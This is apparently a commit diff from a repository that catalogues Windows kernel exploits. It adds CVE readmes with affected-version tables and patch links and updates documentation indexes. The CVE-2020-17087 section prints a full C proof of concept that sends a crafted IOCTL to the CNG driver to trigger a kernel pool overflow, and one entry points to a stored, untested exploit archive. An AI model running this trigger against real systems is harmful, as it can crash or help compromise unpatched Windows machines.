| Windows Server 2008 | X64 | R2 | SP1 | |
| Windows Server 2008 | X86/X64 | | SP2 | |
| Windows RT 8.1 | | | | |
| Windows 8.1 | X86/X64 | | | |
| Windows 7 | X86/X64 | | SP1 | |
| Windows Server 2016 | | | | |
| Windows 10 | X86/X64 | 1607 | | |
| Windows 10 | | | | |
| Windows 10 | X86/X64/ARM64 | 20H2 | | |
| Windows 10 | X86/X64/ARM64 | 2004 | | |
| Windows 10 | X86/X64/ARM64 | 1903 | | |
| Windows 10 | X86/X64/ARM64 | 1909 | | |
| Windows 10 | X86/X64/ARM64 | 1809 | | |
| Windows 10 | X86/X64/ARM64 | 1803 | | |
| Windows Server | | 20H2 | | |
| Windows Server | | 2004 | | |
| Windows Server | | 1903 | | |
| Windows Server | | 1909 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17087
```
#### Utilization
```
#pragma comment(lib, "ntdll")
#include <cstdio>
#include <windows.h>
int main() {
HANDLE hCng = CreateFileA("\\\\.\\GLOBALROOT\\Device\\Cng",
GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if (hCng == NULL) {
printf("[-] Failed to open \\Device\\Cng: %u\n", GetLastError());
return 1;
}
printf("[+] \\Device\\Cng opened, handle: %p\n", hCng);
//
// DataBufferSize overflows when used for allocating memory in
// cng!CfgAdtpFormatPropertyBlock as (uint16)(DataBufferSize * 6).
//
// In this proof-of-concept, an allocation of (uint16)(0x2AAB * 6) = 2
// bytes is requested while 0x2AAB * 6 = 0x10002 bytes are written to it.
//
CONST DWORD DataBufferSize = 0x2AAB;
CONST DWORD IoctlSize = 4096 + DataBufferSize;
BYTE *IoctlData = (BYTE *)HeapAlloc(GetProcessHeap(), 0, IoctlSize);
RtlZeroMemory(IoctlData, IoctlSize);
*(DWORD*) &IoctlData[0x00] = 0x1A2B3C4D;
*(DWORD*) &IoctlData[0x04] = 0x10400;
*(DWORD*) &IoctlData[0x08] = 1;
*(ULONGLONG*)&IoctlData[0x10] = 0x100;
*(DWORD*) &IoctlData[0x18] = 3;
*(ULONGLONG*)&IoctlData[0x20] = 0x200;
*(ULONGLONG*)&IoctlData[0x28] = 0x300;
*(ULONGLONG*)&IoctlData[0x30] = 0x400;
*(DWORD*) &IoctlData[0x38] = 0;
*(ULONGLONG*)&IoctlData[0x40] = 0x500;
*(ULONGLONG*)&IoctlData[0x48] = 0x600;
*(DWORD*) &IoctlData[0x50] = DataBufferSize; // OVERFLOW
*(ULONGLONG*)&IoctlData[0x58] = 0x1000;
*(ULONGLONG*)&IoctlData[0x60] = 0;
RtlCopyMemory(&IoctlData[0x200], L"FUNCTION", 0x12);
RtlCopyMemory(&IoctlData[0x400], L"PROPERTY", 0x12);
ULONG_PTR OutputBuffer = 0;
DWORD BytesReturned;
BOOL Status = DeviceIoControl(
hCng,
0x390400,
IoctlData,
IoctlSize,
&OutputBuffer,
sizeof(OutputBuffer),
&BytesReturned,
NULL
);
printf("[+] Ioctl sent, Status: %d, OutputBuffer: %zx\n", Status, OutputBuffer);
HeapFree(GetProcessHeap(), 0, IoctlData);
CloseHandle(hCng);
return 0;
}
```
#### Analyse
- https://blog.csdn.net/weixin_43815930/article/details/114123728
- https://www.anquanke.com/post/id/221964

41
TestFailure/CVE-2021-1709/README_EN.md Normal file
View File

@@ -0,0 +1,41 @@
### CVE-2021-1709
#### Describe
Windows Win32k Elevation of Privilege Vulnerability
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| :------------------ | :--------------- | ------- | ------ | ------ |
| Windows Server | | 20H2 | | |
| Windows Server | | 2004 | | |
| Windows Server | | 1909 | | |
| Windows Server 2019 | | | | |
| Windows Server 2016 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2012 | | | | |
| Windows Server 2008 | X86/X64 | | SP2 | |
| Windows Server 2008 | X64 | R2 | | |
| Windows RT 8.1 | | | | |
| Windows 7 | X86/X64 | | SP1 | |
| Windows 10 | X86/X64 | | | |
| Windows 10 | X86/X64/ARM64 | 20H2 | | |
| Windows 10 | X86/X64/ARM64 | 2004 | | |
| Windows 10 | X86/X64/ARM64 | 1909 | | |
| Windows 10 | X86/X64/ARM64 | 1809 | | |
| Windows 10 | X86/X64/ARM64 | 1803 | | |
| Windows 10 | X86/X64 | 1607 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1709
```
#### Utilization
- None

BIN
TestFailure/CVE-2021-31166/CVE-2021-31166.zip Normal file
View File

Binary file not shown.

28
TestFailure/CVE-2021-31166/README.md Normal file
View File

@@ -0,0 +1,28 @@
### CVE-2021-31166
#### 描述
HTTP Protocol Stack Remote Code Execution Vulnerability
#### 影响版本
| Product | CPU Architecture | Version | Update | Tested |
| -------------- | ---------------- | ------- | ------ | ------ |
| Windows 10 | x86/x64/arm64 | 2004 | | |
| Windows 10 | x86/x64/arm64 | 20H2 | | |
| Windows Server | | 2004 | | |
| Windows Server | | 20H2 | | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43224
```
#### 利用方式
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
- [0vercl0k](https://github.com/0vercl0k/CVE-2021-31166)

29
TestFailure/CVE-2021-31166/README_EN.md Normal file
View File

@@ -0,0 +1,29 @@
### CVE-2021-31166
#### Describe
HTTP Protocol Stack Remote Code Execution Vulnerability
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| -------------- | ---------------- | ------- | ------ | ------ |
| Windows 10 | x86/x64/arm64 | 2004 | | |
| Windows 10 | x86/x64/arm64 | 20H2 | | |
| Windows Server | | 2004 | | |
| Windows Server | | 20H2 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31166
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- [0vercl0k](https://github.com/0vercl0k/CVE-2021-31166)

2
docs/Docs/TestFailure.md
View File

@@ -2,6 +2,7 @@
| :--------------------------------------------- | :----------------------------------------------------------: | :-------------------------------------------------: |
| [CVE-2021-43224](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-43224) | Windows Common Log File | Windows 7/8/10/11/2008/2012/2016/2019/2022/Server |
| [CVE-2021-34527](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-34527) | Windows Print Spooler Remote Code Execution | Windows 7/8/10/2008/2012/2016/2019/2022/Server |
| [CVE-2021-31166](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-31166) | HTTP Protocol Stack | Windows 10/Server |
| [CVE-2021-21551](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-21551) | None | None |
| [CVE-2021-1709](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-1709) | Windows Win32k | Windows 7/8.1/10/2008/2012/2016/2019/Server |
| [CVE-2020-17087](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-17087) | Windows Kernel Local Elevation | Windows 7/8.1/10/2008/2012/2016/2019/Server |
@@ -21,7 +22,6 @@
| [CVE-2019-0708](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2019-0708) | Remote Desktop Services | Windows 7/2008 |
| [CVE-2018-8440](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-8440) | Windows ALPC Elevation | Windows 7/8/10/2008/2012/2016 |
| [CVE-2018-1038](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-1038) | Windows Kernel Elevation | Windows 7/2008 |
| [CVE-2018-0743](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-0743) | Windows Subsystem for Linux Elevation | Windows 10/2016 |
| [CVE-2018-0886](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-0886) | CredSSP Remote Code Execution | Windows 7/8/10/2008/2012/2016/2019/Server |
| [CVE-2018-0824](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-0824) | COM for Windows Remote Code Execution | Windows 7/8/10/2008/2012/2016/Server |
| [CVE-2017-11783](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2017-11783) | Windows Elevation | Windows 8/10/2012/2016 |

6
docs/Docs/config.js
View File

@@ -290,9 +290,6 @@ let config = {
{
path: '/CN/CVE-2017-8465', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2017-8465/README.md'
},
{
path: '/CN/CVE-2018-0743', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2018-0743/README.md'
},
{
path: '/CN/CVE-2018-0824', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2018-0824/README.md'
},
@@ -356,6 +353,9 @@ let config = {
{
path: '/CN/CVE-2021-21551', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2021-21551/README.md'
},
{
path: '/CN/CVE-2021-31166', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2021-31166/README.md'
},
{
path: '/CN/CVE-2021-34527', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2021-34527/README.md'
},

2
docs/EnglishDocs/TestFailure.md
View File

@@ -2,6 +2,7 @@
| :--------------------------------------------- | :----------------------------------------------------------: | :-------------------------------------------------: |
| [CVE-2021-43224](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2021-43224) | Windows Common Log File | Windows 7/8/10/11/2008/2012/2016/2019/2022/Server |
| [CVE-2021-34527](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2021-34527) | Windows Print Spooler Remote Code Execution | Windows 7/8/10/2008/2012/2016/2019/2022/Server |
| [CVE-2021-31166](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2021-31166) | HTTP Protocol Stack | Windows 10/Server |
| [CVE-2021-21551](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2021-21551) | None | None |
| [CVE-2021-1709](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2021-1709) | Windows Win32k | Windows 7/8.1/10/2008/2012/2016/2019/Server |
| [CVE-2020-17087](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2020-17087) | Windows Kernel Local Elevation | Windows 7/8.1/10/2008/2012/2016/2019/Server |
@@ -21,7 +22,6 @@
| [CVE-2019-0708](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2019-0708) | Remote Desktop Services | Windows 7/2008 |
| [CVE-2018-8440](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2018-8440) | Windows ALPC Elevation | Windows 7/8/10/2008/2012/2016 |
| [CVE-2018-1038](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2018-1038) | Windows Kernel Elevation | Windows 7/2008 |
| [CVE-2018-0743](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2018-0743) | Windows Subsystem for Linux Elevation | Windows 10/2016 |
| [CVE-2018-0886](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2018-0886) | CredSSP Remote Code Execution | Windows 7/8/10/2008/2012/2016/2019/Server |
| [CVE-2018-0824](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2018-0824) | COM for Windows Remote Code Execution | Windows 7/8/10/2008/2012/2016/Server |
| [CVE-2017-11783](http://kernelhub.ascotbe.com/EnglishDocs/#/EN/CVE-2017-11783) | Windows Elevation | Windows 8/10/2012/2016 |

6
docs/EnglishDocs/config.js
View File

@@ -290,9 +290,6 @@ let config = {
{
path: '/EN/CVE-2017-8465', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2017-8465/README_EN.md'
},
{
path: '/EN/CVE-2018-0743', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2018-0743/README_EN.md'
},
{
path: '/EN/CVE-2018-0824', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2018-0824/README_EN.md'
},
@@ -356,6 +353,9 @@ let config = {
{
path: '/EN/CVE-2021-21551', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2021-21551/README_EN.md'
},
{
path: '/EN/CVE-2021-31166', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2021-31166/README_EN.md'
},
{
path: '/EN/CVE-2021-34527', source: 'https://raw.githubusercontent.com/Ascotbe/Kernelhub/master/TestFailure/CVE-2021-34527/README_EN.md'
},